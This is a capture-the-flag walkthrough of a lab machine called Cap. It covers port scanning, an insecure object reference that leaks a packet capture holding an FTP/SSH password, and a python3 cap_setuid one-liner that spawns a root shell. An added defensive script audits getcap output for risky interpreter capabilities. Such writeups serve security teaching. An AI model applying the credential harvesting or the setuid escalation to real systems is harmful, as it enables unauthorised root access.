# Cap

## Nmap

```
nmap 10.10.10.245 -p- -sS -sV

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    gunicorn
Nmap done: 1 IP address (1 host up) scanned in 141.34 seconds
```

We start by checking whether anonymous login is enabled on FTP, which unfortunately is not the case.

Next we move on to port 80, where we are taken to a page titled Security Dashboard.

![](/files/gN5qCuojuJ37DxGTCCmO)

Preliminary checks on the user interface show we are able to view basic `netstat` information and the IP addresses assigned to local interfaces on the target system.

![](/files/ozHQndSQxmLPxo2nQ5kA)

We also notice that we can download packet capture `PCAP` files.

![](/files/5uVL6rUILAwrMvAMv37k)

Every time we request a new capture under `/capture`, the ID in the download link for the `PCAP` file increments by 1.

Our own captures start from `/data/1`. When we browse to `/data/0`, we are able to download a `PCAP` file that we did not request.

Loading the resulting `PCAP` file into `Wireshark`, we are able to view credentials for the user Nathan.

![](/files/gyhsSSHS8d0JSHwsFSWT)

This gives us the FTP credentials `nathan:Buck3tH4TF0RM3!`

These same credentials can be used for SSH access.

```
ssh nathan@10.10.10.245
```

![](/files/BnyIAcQOSmAIMGkMCb8D)

Now logged on, we begin enumerating. Checking which file capabilities are set on the target system, we see that Python 3 has some interesting ones.

```
getcap -r / 2>/dev/null
```

![](/files/h61G9qb0oCiv1PaPgNPu)

The `cap_setuid` capability allows the `python3` process to set its own UID to 0, which is root. We can use this to spawn a root bash shell.

```
python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
```

![](/files/YVhs9LgPyfBwBcri7NBn)
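
To check a host for the misconfiguration used above, this added example (not part of the original writeup) parses `getcap -r` output in both the older `path = caps+flags` and the newer `path caps=flags` libcap formats and flags interpreters that hold root-equivalent capabilities. The sample output, the capability list and the interpreter name pattern are constructed assumptions.

```python
import os
import re

# Capabilities treated here as root-equivalent on an interpreter (assumed list, extend as needed).
RISKY_CAPS = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace",
              "cap_sys_module", "cap_dac_override", "cap_dac_read_search", "cap_chown"}
# Binaries that run caller-supplied code, matched on basename (assumed pattern).
INTERPRETER_RE = re.compile(r"^(python|perl|ruby|node|php|lua|bash|dash|sh)[\d.]*$")
# One clause of capability text: "cap_a,cap_b" then "+" or "=" then the e/i/p flags.
CLAUSE_RE = re.compile(r"(cap_[a-z0-9_]+(?:,cap_[a-z0-9_]+)*)[+=]([eip]+)")

def parse_getcap_line(line):
    """Return (path, {capability: flags}) for one getcap line, or None if it has no clause."""
    match = CLAUSE_RE.search(line)
    if match is None:
        return None
    # Older libcap prints "path = caps+flags", newer prints "path caps=flags".
    path = line[:match.start()].rstrip(" =")
    caps = {}
    for names, flags in CLAUSE_RE.findall(line[match.start():]):
        for name in names.split(","):
            caps[name] = flags
    return path, caps

def audit(getcap_output):
    """List (path, risky_caps) for interpreters holding a risky capability in the permitted set."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line.strip())
        if parsed is None:
            continue
        path, caps = parsed
        # "p" (permitted) is what matters; an "i"-only capability grants nothing by itself.
        risky = sorted(c for c, flags in caps.items() if c in RISKY_CAPS and "p" in flags)
        if risky and INTERPRETER_RE.match(os.path.basename(path)):
            findings.append((path, risky))
    return findings

# Constructed sample of `getcap -r / 2>/dev/null` output, mixing both formats.
SAMPLE = """\
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/perl5.30 cap_setuid=ep
/usr/bin/traceroute6.iputils cap_net_raw=ep
"""

if __name__ == "__main__":
    for path, caps in audit(SAMPLE):
        # setcap -r removes all file capabilities from the binary.
        print(f"{path}: {','.join(caps)} -> fix with: setcap -r {path}")
```
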

